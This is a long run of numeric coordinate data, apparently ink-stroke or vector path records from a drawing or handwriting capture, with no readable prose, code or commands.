0,-9 0 0,2-5 0,-8-2 0,0 1 0,4-4 0,-5 9 0,6-9 0,0 9 0,0-9 0,-1 4 0,1-5 0,-5 0 0,-1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2:5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24575,'-5'32'0,"-1"-6"0,-7 13 0,7-3 0,-5-4 0,10 9 0,-10 7 0,10 27 0,-5-12 0,6 32 0,0-34 0,0 16 0,0-9 0,0 9 0,0-5 0,0 7 0,0-18 0,0-9 0,0-11 0,0-1 0,0-7 0,10 7 0,3 1 0,27 22 0,-7-22 0,20 32 0,-15-32 0,3 18 0,-7-19 0,-10-6 0,-9-13 0,-10-10 0,-5-7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2:56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24575,'18'17'0,"8"1"0,-12-1 0,12 0 0,-14-7 0,3 1 0,-4 0 0,0-1 0,0 7 0,5 5 0,-4 7 0,4 5 0,-4 0 0,4 0 0,-3 4 0,3-7 0,-5 16 0,-4-20 0,3 27 0,-9-33 0,9 16 0,-9-15 0,4 23 0,-5-17 0,0 25 0,0-28 0,0 35 0,0-21 0,0 11 0,0-18 0,0-13 0,0 17 0,0-16 0,0 13 0,0-5 0,0-9 0,0 17 0,0-15 0,0 43 0,0-22 0,0 25 0,0-25 0,0 2 0,0-19 0,0 15 0,-4-26 0,-2 16 0,-10-13 0,9-1 0,-8 0 0,-5 9 0,1-6 0,-13 12 0,15-10 0,-8 5 0,12-8 0,-7 2 0,4-9 0,4 0 0,-4-5 0,10 3 0,1-3 0,5 5 0,0-5 0,0-2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3:00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1 24575,'-6'4'0,"-9"-2"0,8 7 0,-10-8 0,7 9 0,-1-4 0,0 0 0,0 9 0,-5-8 0,8 9 0,-1-5 0,-1 10 0,-3-3 0,-5 15 0,2-15 0,5 9 0,0-9 0,-5 5 0,-6 15 0,8-16 0,-6 14 0,9-19 0,-2 1 0,-2 2 0,4-3 0,0 4 0,5-4 0,-4 7 0,9-10 0,-4 6 0,5-10 0,0 1 0,0 0 0,0 0 0,0-1 0,5-4 0,1-1 0,10 0 0,-5-4 0,5 4 0,0 0 0,7 1 0,1 5 0,-2-5 0,31 10 0,-17-8 0,20 3 0,-22-6 0,-6 0 0,7-3 0,0 3 0,15-5 0,-19 0 0,33 0 0,-40 0 0,38 0 0,-40 0 0,15 0 0,-20 0 0,-1 0 0,5 0 0,2 0 0,0 0 0,-3 0 0,-14 0 0,-1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3:15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24575,'10'0'0,"17"0"0,-7 0 0,14 0 0,4 0 0,-1 0 0,4 0 0,-13 0 0,4 0 0,-12 0 0,14 0 0,-6 0 0,1-11 0,-6 9 0,4-9 0,-10 11 0,5-4 0,-1 2 0,-4-3 0,-6 5 0,-6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3:16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24575,'16'0'0,"1"0"0,1 0 0,-3 0 0,-4 0 0,-1 0 0,1 0 0,5 0 0,-5 0 0,10 0 0,-3 0 0,5 0 0,-5 0 0,8 0 0,19 0 0,-11 0 0,9 0 0,-16 0 0,-5 0 0,2 0 0,-9 0 0,-10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3:18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724 1 24575,'-30'0'0,"-1"0"0,3 0 0,2 0 0,-2 0 0,-5 0 0,18 0 0,-17 0 0,-6 0 0,10 0 0,-22 0 0,25 0 0,-9 0 0,4 0 0,-19 10 0,11 18 0,-1-1 0,18 5 0,3 7 0,5-1 0,-11 13 0,16-3 0,-14-1 0,8 21 0,-6-14 0,8 11 0,1-17 0,10 9 0,-4 5 0,5 6 0,0 13 0,0-27 0,0 12 0,0-32 0,0-11 0,0-3 0,4-14 0,2-1 0,5 0 0,4-4 0,13 9 0,7-9 0,18 4 0,7-2 0,1 0 0,7-2 0,-3 2 0,-5 0 0,-26-3 0,33 0 0,-37 0 0,20 0 0,-22 0 0,1-5 0,5-2 0,0-4 0,3 0 0,-17 4 0,-1 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5T14:39:52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24575,'45'0'0,"-3"0"0,47 0 0,-15 0 0,15 0 0,2 0 0,1 0 0,1 0 0,8 0-1433,-15 0 1,8 0 0,2 0 0,-2 0 0,-5 0 1432,-6 0 0,-7 0 0,3 0 0,11 0 0,-13 0 0,8 0 0,7 1 0,3-1 0,0 1 0,-1-1 0,-6-1 0,-7 0-184,4-2 1,-7-1 0,-3 0 0,2 1 0,9 0 183,-6 2 0,7 0 0,5 1 0,2 1 0,0-1 0,-3 0 0,-6-1 0,-7-1 0,20-4 0,-9-1 0,-5 0 0,2 2-240,-1 1 1,0 2 0,-2 0 0,-1 0 239,20-1 0,-2-1 0,-2 1 0,-4 0 0,-1 0 0,-2 1 0,-7 2 0,-2 0 0,-5 0 0,12 0 0,-5 0-267,-2 0 1,-7 0 266,5 0 2077,4 0 1,0 0-2078,13 0 1475,-19 0 1,2 0-1476,-25 2 0,-3 2 753,5 2 0,2 2-753,12 3 0,2 1 0,1 1 0,2 2 0,16 4 0,1 0 0,-12-3 0,-3 0 477,-13-1 1,3 0-478,-3-3 0,6 0 0,-7-2 0,-3-1 0,-2-1-312,26 3 1,-4-1 311,5-4 0,-9-6 0,5 0 0,1 0 0,8 0 0,-11 0 0,-12 0 0,-43 0 0,15 0 0,-9 0 0,3 0 0,-2 0 623,6 0-623,-13 0 0,5 0 0,-20 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-5 0 0,-2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3:21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831 1 24575,'-28'0'0,"4"0"0,-4 0 0,-6 0 0,2 0 0,-10 0 0,4 0 0,0 0 0,1 0 0,-42 0 0,31 0 0,-48 0 0,44 0 0,-10 0 0,9 10 0,16 13 0,-1 8 0,13 14 0,2-5 0,12 13 0,5 2 0,6 22 0,0 2 0,0 15 0,0 5 0,0-13 0,6 4 0,6-28 0,1-8 0,8-20 0,-5-7 0,6-6 0,4-4 0,-4-6 0,0-7 0,18-4 0,-22 0 0,33 0 0,-20 0 0,15 0 0,7-16 0,2 1 0,27-23 0,-9 6 0,-24 12 0,0 0 0,29-18 0,-2 5 0,-4 3 0,-22 6 0,-4 11 0,-23-2 0,18 4 0,-13-1 0,20-8 0,-19 7 0,3-3 0,-19 10 0,1 2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3:23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24575,'40'0'0,"27"0"0,-23 0 0,35 0 0,9 0 0,-1 0 0,-5 0 0,11 0 0,-32 0 0,19 0 0,-26 0 0,6 0 0,-1 0 0,5 0 0,-12 0 0,0 0 0,5 0 0,0 1 0,3-2 0,17-5 0,-27 6 0,1-2 0,48-9 0,-15 9 0,-8-8 0,-5 3 0,-32 1 0,-8 0 0,-26 6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3:24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0 24575,'-17'17'0,"2"-2"0,-6-4 0,7 0 0,-7 0 0,5 0 0,3-1 0,-3 1 0,0 0 0,9 0 0,-13-1 0,13 1 0,-5 4 0,-3-2 0,12 2 0,-7-4 0,5 0 0,4 4 0,-9-3 0,9 4 0,1-10 0,6-2 0,5 1 0,0-4 0,14 14 0,0-3 0,9 5 0,-6-1 0,5-4 0,-2 4 0,8 2 0,-10 4 0,-2 0 0,-6-6 0,0 0 0,1-6 0,-1-4 0,-4-1 0,3-5 0,-13 0 0,3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3:25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1661 0 24575,'-43'0'0,"8"0"0,-35 0 0,22 0 0,-3 0 0,-3 0 0,-14 0 0,-12 0 0,18 0 0,12 0 0,-3 0 0,-38 0 0,18 0 0,-3 0 0,16 0 0,0 0 0,-12 0 0,2 0 0,-26 0 0,1 0 0,23 0 0,-3 0 0,1 0 0,13 0 0,32 0 0,8 0 0,10 0 0,5 0 0,1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3:27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499 0 24575,'-16'0'0,"-2"10"0,-6 3 0,1-1 0,-1 15 0,1-12 0,4 9 0,-3-7 0,4-6 0,0 5 0,-10 14 0,-17 11 0,9-8 0,-7-1 0,16-15 0,8 5 0,-9 2 0,11 8 0,1-14 0,9 3 0,-8-10 0,13 5 0,-9-4 0,11 4 0,5-11 0,1 0 0,5-5 0,-1 0 0,1 5 0,0-4 0,15 14 0,-5-7 0,37 19 0,-28-13 0,23 7 0,-24-10 0,5-5 0,-5 3 0,-2-3 0,-6 0 0,0-1 0,-4-5 0,8 5 0,-12-4 0,7 8 0,-9-7 0,4 7 0,-3-3 0,4 5 0,-10-5 0,-2-2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3:31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24575,'0'53'0,"0"-16"0,0 49 0,0-10 0,0 17 0,0-38 0,0 0 0,0-4 0,0 0 0,0 35 0,0 1 0,0-31 0,0 22 0,0-27 0,0 11 0,0-10 0,0-22 0,0 12 0,0-25 0,0 0 0,0-2 0,0-9 0,0-1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3:33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24575,'28'0'0,"-3"0"0,11 0 0,-8 0 0,28 0 0,-18 0 0,27 0 0,-24 0 0,-2 0 0,-4 0 0,18 0 0,-14 0 0,21 0 0,-14 0 0,-15 0 0,16 0 0,-20 0 0,18 11 0,-14-4 0,14 26 0,-1-1 0,2 8 0,1 4 0,16 19 0,-21-18 0,-4 1 0,-2 15 0,-8-6 0,-4 4 0,0 5 0,-10-17 0,1 30 0,-13-36 0,3 22 0,-5-10 0,0-5 0,0-1 0,-5-1 0,-6-11 0,-7 5 0,-14-6 0,12-11 0,-16 3 0,12-9 0,-36 6 0,24-5 0,-29-2 0,29-4 0,-11-6 0,6 5 0,-4-5 0,4 6 0,-11-6 0,20-1 0,-10-5 0,23 0 0,-8 0 0,4 0 0,6 0 0,-10 0 0,9 0 0,-9 0 0,5 5 0,5-4 0,1 4 0,6 0 0,4 6 0,1-4 0,5 2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3:35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24575,'11'30'0,"7"0"0,15 8 0,-8-8 0,17 19 0,-21-22 0,10 21 0,7-3 0,-21-10 0,15 9 0,-20-15 0,5-4 0,21 65 0,-3-22 0,-9-12 0,-1 3 0,2 23 0,3-22 0,-11 4 0,0-24 0,-1 25 0,-6-23 0,-5 29 0,-1-22 0,-1 7 0,-3 13 0,3-26 0,-5 19 0,0-12 0,0 2 0,0 33 0,0-16 0,0 3 0,0-13 0,0-2 0,0-5 0,0-1 0,0 39 0,0-27 0,0 22 0,0-37 0,0 4 0,0-2 0,0-6 0,0 55 0,0-48 0,0 29 0,0-39 0,0 4 0,-5-10 0,-1 9 0,0-14 0,-4 7 0,3-13 0,-3 12 0,-2-16 0,6 5 0,-8-5 0,7-2 0,-14 8 0,9-5 0,-3-4 0,-6 8 0,3-7 0,-4-2 0,7-6 0,4-5 0,5-4 0,1 4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3:37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24575,'0'11'0,"0"0"0,0 4 0,0 7 0,0 1 0,0-1 0,0-1 0,0-4 0,0 1 0,0 3 0,0-9 0,0 9 0,0-4 0,0 5 0,0-5 0,0 3 0,0-3 0,0 0 0,0-2 0,0 5 0,0-2 0,0 8 0,5-14 0,1-2 0,5-10 0,-1 0 0,6 4 0,-4-3 0,9 9 0,1-3 0,3-1 0,2 5 0,-3-10 0,-1 9 0,4-4 0,-4 1 0,-1 2 0,-12-3 0,-5 0 0,-5-1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3:42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1 24575,'-10'26'0,"2"-6"0,-14 9 0,2 23 0,-4-10 0,3 22 0,3-8 0,-6 0 0,8 8 0,-8-6 0,10 12 0,2-12 0,-1 1 0,6 2 0,-4-28 0,10 35 0,-21 13 0,18 1 0,-10-29 0,1-5 0,10-2 0,-8 6 0,11-16 0,0 12 0,0 16 0,0 7 0,0-16 0,0 4 0,0-33 0,0 2 0,5 4 0,6 2 0,1 3 0,3-1 0,1-15 0,-4 1 0,8-6 0,-3-5 0,-1-6 0,4 0 0,7 1 0,-8 4 0,6 1 0,-3 0 0,-13-4 0,8-2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5T14:40:28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1 392 24575,'0'17'0,"0"-2"0,0-4 0,0-1 0,0 1 0,0 5 0,5-5 0,0 5 0,11-1 0,1-2 0,0-3 0,4 0 0,-9-4 0,4 0 0,-6-1 0,-4 0 0,4-4 0,-4 8 0,4-3 0,1 10 0,9 10 0,-11-7 0,10 6 0,-13-10 0,4 2 0,-4 0 0,-1-28 0,-10 0 0,-2-24 0,-15-5 0,7 6 0,-8-14 0,5-7 0,4 3 0,-4-15 0,12 12 0,1 12 0,5 15 0,0 6 0,0 5 0,0-15 0,0 8 0,0-13 0,4 19 0,3-9 0,14 10 0,-2-1 0,9 7 0,36 0 0,-37 10 0,30-4 0,-46 5 0,4 0 0,-3 0 0,3 0 0,1 0 0,1 0 0,4 0 0,-4 0 0,-2 0 0,-9 0 0,-1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3:45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5 24575,'-11'0'0,"-5"0"0,-16 0 0,5 0 0,-9 0 0,12 0 0,-16 0 0,13-5 0,-8 9 0,8 1 0,-2 18 0,-2 6 0,-3 11 0,5 35 0,9-31 0,3 23 0,-5-16 0,13-15 0,-24 57 0,18-36 0,-2 32 0,12-44 0,5 16 0,0-28 0,0 9 0,0-8 0,0 1 0,14 5 0,-5-10 0,11-4 0,1-6 0,-8-7 0,12 12 0,2-12 0,9 2 0,10-8 0,0-2 0,11-5 0,-18 0 0,5 0 0,-21 0 0,21 0 0,-16 0 0,46-10 0,-39 2 0,14-8 0,-17 5 0,-19 5 0,8 1 0,-15 5 0,-1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3:47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24575,'30'18'0,"27"33"0,-19-19 0,17 24 0,-19-10 0,5-8 0,-12 5 0,26 8 0,-25-4 0,22 19 0,-3 9 0,-12-19 0,0 16 0,-13-32 0,-7 6 0,0-12 0,-4 34 0,-1-29 0,-7 24 0,-5-46 0,0 7 0,0 24 0,-5-2 0,-7 17 0,-12-3 0,-1-12 0,0 4 0,4-11 0,3-1 0,-5-6 0,6-5 0,5-7 0,-2 9 0,6 0 0,-8 14 0,4-4 0,-4 3 0,9-9 0,-3-2 0,10-17 0,0-6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3:53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24575,'32'0'0,"4"0"0,5 0 0,-7 0 0,12 0 0,-4 0 0,-9 0 0,7 0 0,-8 0 0,-12 0 0,5 0 0,-14 0 0,4 0 0,-8 0 0,3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3:54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24575,'16'0'0,"7"0"0,-4 0 0,7 0 0,8 0 0,-6 0 0,12 0 0,-17 0 0,0 0 0,0 0 0,1 0 0,3 0 0,3 0 0,-7 0 0,-2 0 0,-15 0 0,-1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3:57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25 546 24575,'0'31'0,"0"7"0,0 5 0,0-1 0,0 14 0,0-8 0,0-8 0,0 1 0,0-1 0,0-20 0,0 7 0,0-16 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-30 0,0 7 0,0-67 0,0 32 0,-11-26 0,8 4 0,-8 1 0,11 7 0,0 7 0,0 20 0,0 5 0,0-1 0,0 10 0,0 9 0,5 5 0,1 1 0,5 5 0,4 10 0,-3-8 0,-1 12 0,-2-12 0,-3 2 0,5-4 0,-1 0 0,1 0 0,0 5 0,-1 1 0,6 10 0,-4-5 0,4 10 0,-5-3 0,0 5 0,6 11 0,-4-9 0,9 14 0,-5-10 0,0-1 0,-1-6 0,-5 3 0,-5-12 0,3 8 0,-8-20 0,4-8 0,-5-17 0,0-32 0,0 5 0,0-19 0,0 16 0,0-17 0,0-4 0,0-3 0,5 10 0,2 15 0,-1 11 0,4 3 0,1 10 0,1 7 0,8 1 0,-13 9 0,7 1 0,-8 7 0,5 4 0,4 0 0,2 0 0,0 0 0,4 20 0,-4 6 0,7 27 0,6 8 0,-5 1 0,5 5 0,-6-6 0,6 17 0,-4-7 0,-2-9 0,-6-15 0,-7-14 0,6 3 0,-4 5 0,4-1 0,-11-17 0,4-2 0,-9-10 0,4 0 0,0-1 0,-4 1 0,4 0 0,-1-5 0,-2 3 0,2-3 0,1 5 0,-4 0 0,9 4 0,-9-3 0,8 8 0,-7-8 0,7 3 0,-8-4 0,4 0 0,-5-1 0,5 6 0,-4-4 0,4-2 0,-5-5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7:23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0 167 24575,'24'0'0,"12"0"0,-9 0 0,47 0 0,-27 0 0,23 0 0,-1 0 0,-18 0 0,12 0 0,-1 0 0,-21 0 0,7 0 0,-18 0 0,10 0 0,4 0 0,10 0 0,-1 0 0,-6 0 0,-7 0 0,0 0 0,-12 0 0,-1 0 0,-1 0 0,-8 0 0,7 0 0,2 0 0,-3 0 0,8 0 0,-11 0 0,-4 0 0,-2 0 0,-4 0 0,0 0 0,-10 0 0,-23 0 0,-6 0 0,-12 0 0,3 0 0,-11 0 0,-11 0 0,-5 0 0,4 0 0,13 0 0,-1 0 0,-5 0 0,5 0 0,-5 0 0,17 0 0,8 0 0,1 0 0,-2 0 0,0 0 0,-9 0 0,4 0 0,-14 6 0,-6 1 0,-1 5 0,-4 0 0,10-6 0,2 4 0,13-8 0,6 3 0,12-5 0,0 5 0,15-4 0,2 4 0,10-5 0,11 0 0,28 0 0,33 0 0,-10 0 0,4 0 0,-9-3 0,0 0 0,12 0 0,-2-2 0,-19-4 0,-3-1 0,38-5 0,-11-9 0,-16 15 0,-18-6 0,-9 9 0,-13 0 0,-10 1 0,-17 5 0,-3 0 0,-35 0 0,2 0 0,-14 0 0,-2 0 0,-19 0 0,-13 0 0,34 0 0,0 0 0,-36 0 0,18 0 0,15 0 0,12 0 0,7 0 0,6 0 0,12 0 0,10 0 0,7 0 0,62 0 0,-20 0 0,44 0 0,-1 0 0,-16 0 0,18 0 0,-2 0 0,-27 0 0,12 0 0,-9 0 0,3 0 0,-12 0 0,-15 0 0,-34 0 0,-61 0 0,16 0 0,-39 0 0,2 0 0,18 0 0,-11 0 0,2 0 0,15 0 0,-21 0 0,20 0 0,2 0 0,12 0 0,7 0 0,7 0 0,5 0 0,1 0 0,4 0 0,-4 0 0,9 0 0,-3 0 0,-1 0 0,-6 0 0,-12 0 0,-12 0 0,14 0 0,-21 0 0,33 0 0,-13 0 0,17 0 0,20-5 0,4 4 0,20-4 0,35 5 0,-11 0 0,34-6 0,-30 4 0,30-4 0,-10 6 0,-5-3 0,-2 0 0,3 2 0,17-10 0,-62 10 0,-14-4 0,8 5 0,-10 0 0,-5-5 0,3 4 0,-3-4 0,5 1 0,-1 2 0,15-7 0,-6 3 0,12-5 0,-9 0 0,-1 5 0,1-4 0,4 9 0,-9-4 0,-11 5 0,-9 0 0,-29 0 0,11 0 0,-12 0 0,-8 0 0,8 0 0,-16 0 0,18 0 0,-22 0 0,-6 0 0,-19 0 0,-4 0 0,12 6 0,3-5 0,18 9 0,-3-9 0,27 8 0,-7-7 0,15 2 0,-6 1 0,6-4 0,2 4 0,-1 0 0,4-4 0,-3 4 0,4-5 0,5 5 0,6-4 0,21 3 0,0-4 0,19 0 0,15 0 0,-12 0 0,19 0 0,-1 0 0,-17 0 0,18 0 0,-25 0 0,1 0 0,30 0 0,-34 0 0,45 0 0,-47 0 0,8 0 0,-10 0 0,-13 0 0,4 0 0,-4 0 0,-2 0 0,-4 0 0,0 0 0,4 0 0,2 0 0,-1 0 0,0-4 0,-5 2 0,-1-2 0,1 4 0,0 0 0,-1 0 0,1 0 0,0-5 0,-1 4 0,1-4 0,-5 5 0,-1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32:02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33:53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1810 24575,'0'-55'0,"11"-3"0,5-16 0,17 0 0,-1-7 0,8-2 0,-13 21 0,-1-2 0,-7 15 0,0-2 0,8-33 0,-1 0 0,-12 31 0,-1 2 0,1-23 0,1-1 0,-1 18 0,-1 1 0,1-3 0,-1 0 0,-2 2 0,0-2 0,7-12 0,0 1 0,-7 18 0,0 3 0,14-45 0,-15 56 0,-5 27 0,1 5 0,6 30 0,0 7 0,2 36 0,-4-16 0,0 3 0,-2-5 0,1 2 0,5 15 0,1 4 0,2 19 0,-1-4 0,-3-34 0,0 1 0,1 14 0,2 8 0,-1-6 0,0-7 0,1-2 0,0 11 0,0 1 0,4 1 0,-1-6 0,-3 1 0,7 16 0,-12-48 0,0-2 0,0-12 0,0 1 0,-5-1 0,3-9 0,-8-2 0,4-10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33:54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24575,'44'0'0,"9"0"0,1 0 0,0 0 0,3 0 0,1 0 0,15 0 0,10 0 0,-28 0 0,8 0 0,-49 0 0,13 0 0,-21 0 0,-1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33:55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24575,'0'30'0,"0"1"0,0 38 0,0-16 0,0-3 0,0 4 0,0 31 0,0-33 0,0 0 0,0 23 0,6 18 0,2-40 0,-1 24 0,5-30 0,-5-2 0,5 13 0,-1-7 0,-4-3 0,-3-22 0,-4-21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5T14:40:31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0 308 24575,'0'16'0,"0"2"0,0 22 0,0-13 0,0 13 0,0-6 0,0-13 0,0 6 0,0-11 0,5-4 0,1 14 0,10 2 0,-4-4 0,9 12 0,-9-18 0,9 9 0,-14-10 0,7-2 0,-8-9 0,0 4 0,3-9 0,-3 4 0,5-5 0,0 0 0,-1 0 0,1 0 0,0-5 0,0-13 0,1-1 0,11-34 0,-8 24 0,24-52 0,-23 50 0,17-37 0,-15 38 0,0-4 0,-3 6 0,-4 12 0,-5 0 0,4 10 0,-4 1 0,4 5 0,1 10 0,1 3 0,-1 5 0,5 14 0,2-7 0,10 20 0,1-9 0,6 9 0,-6-10 0,-6-5 0,-3-5 0,-12-13 0,6-1 0,-13-2 0,9-7 0,-5-2 0,1-11 0,4-7 0,-8 1 0,8-15 0,2-39 0,-4 18 0,6-10 0,0 1 0,-10 20 0,17-37 0,-14 44 0,9-5 0,7-16 0,-5 19 0,3-1 0,-15 22 0,3 10 0,-7 2 0,2 4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33:58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24575,'16'-5'0,"17"-7"0,-6-1 0,6 2 0,-6 6 0,-9 5 0,4 0 0,-7 0 0,-4 0 0,0 0 0,-1 0 0,1 20 0,1-4 0,-1 17 0,12 7 0,-3 11 0,10 17 0,-11 8 0,-7-7 0,-6 12 0,-6-27 0,0 12 0,-5-23 0,-12 3 0,-8-5 0,-10-1 0,6-11 0,6-2 0,8-15 0,9 2 0,1-17 0,10 6 0,1-12 0,4 3 0,1 0 0,0-4 0,4 4 0,30-21 0,0 1 0,33-5 0,-16 2 0,-1 16 0,-14 0 0,-2 8 0,-15 5 0,8 0 0,-9 0 0,4 0 0,1 0 0,4 10 0,-13-8 0,0 12 0,-19-3 0,-2 1 0,-4 3 0,0-4 0,0 4 0,0-3 0,0 23 0,0-20 0,0 15 0,0-19 0,0 14 0,-4-10 0,2 16 0,-12-8 0,1 6 0,-10 5 0,6-1 0,-4 1 0,4-5 0,-5 3 0,0-4 0,5-5 0,-9 12 0,13-20 0,-8 11 0,10-20 0,-20 8 0,5-7 0,-23 14 0,7-9 0,1 5 0,-4-5 0,5-6 0,9-1 0,0-5 0,19 0 0,-3 0 0,-6 0 0,3 0 0,-3 0 0,5 0 0,10 5 0,-4-4 0,9 4 0,-4-5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34:1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16981 269 24575,'-53'0'0,"8"0"0,-34 0 0,6 0 0,-10 0 0,4 0 0,-6 0 0,10 0 0,-4 0-1788,9 0 1,-4 0 0,0 0 1787,7 0 0,1 0 0,-4 0 0,-22 0 0,-6 0 0,-3 0 0,20 0 0,-2 0 0,-2 0 0,-4 0 0,4 0 0,-1 0 0,-4 0 0,-3 0 0,-7 0 0,13 0 0,-7 0 0,-4 0 0,-2 0 0,-1 0 0,1 0 0,5 0 0,5 0 0,-2 0 0,6 0 0,2 0 0,1 0 0,-3 0 0,-4 0-609,4 0 1,-6 0-1,-4 0 1,0 0-1,1 0 1,5 0 0,6 0-1,10 0 609,-30 0 0,15 0 0,1 0 0,4 0 0,2 0 0,1 0 416,3 0 1,0 0 0,-1 0-417,-3 0 0,-2 0 0,-3 0 0,6 0 0,-4 0 0,-1 0 0,0 0-598,0 0 1,0 0 0,0 0 0,4 0 597,-10 0 0,3 0 0,1 0 0,1 3 0,1 0 0,0 0 287,7-2 0,0-1 0,-1 1-287,-8 2 0,-1 0 0,1-1 0,6-1 0,2-1 0,0-1 0,2 1 0,0 0 0,2 0 0,5 0 0,2 0 0,-4 0 0,-12 0 0,-4 0 0,1 0 0,2 0 0,1 0 0,-1 0 0,2 0 0,-1 0 0,-8 0 0,3 0 0,-9 0 0,-5 0 0,4 0 0,10 0 0,-4 0 0,9 0 0,-12 0 409,8 0 1,-12 0 0,-6 0 0,0 0 0,5 0-1,11 0-409,9 0 0,9 0 0,2 0 0,-5 0 0,-19 0 0,-5 0 0,0 0 0,4 0-89,12 1 1,1-1 0,2 0 0,0-1 88,-1 0 0,1 0 0,0-1 0,1-1 0,5-2 0,0 0 0,1-2 0,-2-2 0,-7-3 0,-2-3 0,1-1 0,8 2 0,7 1 0,5 0 0,-1-2 0,-14-5 0,-3-3 0,11 1 1583,13 2 0,6 2-1583,-34-8 0,34 10 0,1 4 967,-25 12-967,-6 10 0,-6 3 0,10-3 0,0 1 688,14 2 1,-3 2 0,0-1-689,-1-2 0,0-1 0,2 0 172,-11 3 1,1-1-173,-5-1 0,-2-1 0,14-3 0,-1 0 0,7 0 0,9 1 0,-1-1 0,-16 0 0,-8 0 0,7 0 0,15 0 0,4-1 0,-9-3 0,-1 0 0,-4 3 0,1-1 0,4-1 0,-1-2 0,-18 2 0,0-1 0,12-1 0,2 0 254,0 0 1,0 0-255,4-3 0,0 2 675,0 4 0,0-1-675,5-4 0,-2 0 0,-23 5 0,2 0 0,-8-5 0,18 3 0,1-2 0,3-2 0,-18 0 0,25 0 0,-3 0 0,36 0 0,-28 0 0,29 0 0,-16 0 0,23 0 0,-2 0 0,-10 0 0,9 0 0,-11 0 0,11 0 0,-16 0 0,15 0 0,-25 0 0,35 0 0,-23 0 0,22 0 0,-16 0 0,18 0 0,-4 0 0,5 0 0,0 0 0,1 0 0,-11 0 0,8 0 0,-12 0 0,-7 0 0,-5 0 0,-8 0 0,5 0 0,12 0 0,5 0 0,3 0 0,8 0 0,-4 0 0,5 0 0,-4 0 0,3 0 0,-9 0 0,9 0 0,1 0 0,6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35:34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1117 48 24575,'-29'0'0,"-6"0"0,0-5 0,-4-2 0,4-5 0,-28 0 0,31 5 0,-31 2 0,21 5 0,-3 0 0,-15 0 0,11 0 0,-41 11 0,37-3 0,-19 14 0,25 2 0,8 17 0,-3-8 0,7 7 0,1 0 0,7 4 0,-8 17 0,11-1 0,10 1 0,3-6 0,11 28 0,0-44 0,0 24 0,0-46 0,5 11 0,11 6 0,-2-9 0,7 6 0,-15-19 0,4 5 0,1-2 0,0-8 0,0 7 0,3-8 0,3 0 0,1 4 0,2-9 0,-9 4 0,-1-5 0,1 0 0,0 0 0,0 5 0,9-4 0,-7 3 0,7-4 0,-9 0 0,-1 0 0,1 0 0,-10 0 0,-17 0 0,1 0 0,-16 0 0,8 6 0,-1-5 0,-5 9 0,-11-3 0,13 5 0,-13 0 0,12 4 0,9-8 0,-8 7 0,15-4 0,-5 1 0,11 3 0,-3-4 0,3 20 0,0-6 0,1 19 0,5-15 0,0-1 0,0 5 0,0 4 0,0 9 0,0-10 0,0 7 0,0-18 0,0 11 0,0-13 0,4-2 0,7-5 0,1-1 0,8-3 0,2 8 0,-5-8 0,8 4 0,-2-1 0,10 2 0,2 1 0,3-2 0,-4-5 0,0 0 0,0-5 0,0 4 0,5-4 0,-15 1 0,8-2 0,-20-5 0,4 0 0,0 0 0,1 0 0,11 0 0,-5 0 0,-1 0 0,4 0 0,-8 0 0,5 0 0,30 0 0,-23 0 0,30 0 0,-26 0 0,9-5 0,-2-11 0,-7 7 0,12-15 0,-30 21 0,14-11 0,-19 13 0,-5-9 0,3 9 0,-8-9 0,4 4 0,0-4 0,1-1 0,5 5 0,-6-4 0,5 4 0,-4 0 0,0-4 0,3 9 0,-7-8 0,7 7 0,-8-7 0,9 8 0,-9-4 0,4 5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34:32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1069 24575,'0'-30'0,"0"-1"0,0-31 0,0 19 0,0-26 0,0 22 0,0-39 0,0 31 0,0-29 0,0 27 0,0-10 0,0-10 0,0 7 0,0-4 0,0 1 0,0 15 0,0 7 0,0 28 0,5 12 0,1 10 0,4 7 0,1 5 0,6 22 0,-4-5 0,10 20 0,-4-10 0,1-1 0,21 42 0,-6-15 0,-13-18 0,1 1 0,22 34 0,-19-34 0,1 6 0,-16-31 0,-1-1 0,-5 1 0,6-1 0,0 0 0,0 1 0,-5-6 0,3 0 0,-3-1 0,5 2 0,-5 0 0,3-2 0,-8-4 0,4-1 0,0-4 0,-4 4 0,4-4 0,0 5 0,-4-6 0,3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34:33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24575,'23'0'0,"0"0"0,11 0 0,-14 0 0,7 0 0,-17 0 0,6 0 0,-3 0 0,13 0 0,-13 0 0,14 0 0,0 0 0,-12 0 0,5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34:34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24575,'0'17'0,"0"-2"0,0 1 0,0-4 0,0 9 0,0-4 0,0 17 0,0-8 0,0 2 0,0-7 0,0-9 0,0 21 0,0-14 0,0 13 0,0-10 0,0-5 0,5-7 0,-4-5 0,4-5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34:36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24575,'11'0'0,"0"0"0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,4 0 0,-3 0 0,3 0 0,-4 0 0,5 0 0,-5 0 0,0 5 0,-1-4 0,-9 9 0,4-4 0,-1 0 0,-3 3 0,4-3 0,-5 5 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,-5 0 0,-1-1 0,-4-4 0,-1 4 0,0-9 0,5 8 0,-4-7 0,4 7 0,-9 2 0,3 1 0,-9 3 0,9-4 0,-8-5 0,8 3 0,-4-7 0,5 2 0,0-4 0,-4 0 0,3 0 0,1 5 0,6 1 0,5 0 0,0-1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34:40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24575,'0'11'0,"0"-1"0,0 6 0,0-4 0,0 8 0,0-8 0,0 3 0,5-4 0,1-5 0,0 3 0,3-7 0,-7 7 0,7-8 0,-3 4 0,0 0 0,4-4 0,-5 8 0,6-7 0,0 2 0,0-4 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1-4 0,-5-2 0,4-5 0,-9 0 0,8 0 0,-8 0 0,4 0 0,0 1 0,-4-1 0,4 0 0,-5 0 0,0 0 0,5 5 0,-4-3 0,4 3 0,-5-5 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0-5 0,0 4 0,0-4 0,0 15 0,0 2 0,0 10 0,4 14 0,2-11 0,0 11 0,-1-14 0,0 0 0,-4-1 0,4 1 0,-5 0 0,4-1 0,2 6 0,0-4 0,-1 3 0,-5-4 0,0-1 0,5 6 0,-4-4 0,4 3 0,0 1 0,0-4 0,1 3 0,-1 0 0,0-3 0,-4 4 0,9-10 0,-9 3 0,4-8 0,-5 4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34:41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24575,'0'10'0,"0"1"0,0 0 0,0 0 0,0-1 0,0 6 0,0 1 0,0 5 0,0-5 0,0-1 0,0 0 0,0-4 0,0 15 0,0-9 0,0 10 0,0 17 0,0-6 0,5 13 0,-3-13 0,3-10 0,0-2 0,-4-6 0,4-4 0,-5-2 0,4 0 0,-3 2 0,4 0 0,0 3 0,-4-8 